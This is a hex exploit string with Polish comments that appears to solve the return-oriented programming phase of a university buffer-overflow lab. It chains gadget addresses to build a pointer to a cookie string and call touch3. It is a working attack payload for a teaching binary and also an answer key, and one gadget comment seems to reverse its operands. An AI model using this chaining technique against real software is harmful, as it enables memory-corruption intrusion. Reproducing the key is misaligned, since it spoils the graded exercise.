00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
46 1f 40 00 00 00 00 00 /* mov rsp, rax <getval_217> + 1 */
55 1e 40 00 00 00 00 00 /* mov rax, rdi <getval_398> + 1 */
72 1e 40 00 00 00 00 00 /* pop rax <addval_175> + 3 */
48 00 00 00 00 00 00 00 /* gdzie względem obecnego miejsca jest nasz adres string'a - 48 bajtów dalej */
8f 1e 40 00 00 00 00 00 /* mov eax,ecx <getval_195> + 1 */
cd 1e 40 00 00 00 00 00 /* mov ecx,edx <setval_292> + 3 */
a3 1e 40 00 00 00 00 00 /* mov edx,esi <getval_233> + 1 */
7c 1e 40 00 00 00 00 00 /* lea  (%rdi,%rsi,1),%rax <add_xy> + 0 */
55 1e 40 00 00 00 00 00 /* mov rax,rdi <getval_398> + 1 */
ac 1d 40 00 00 00 00 00 /* wywołaniue touch3 */
35 33 35 35 66 31 35 35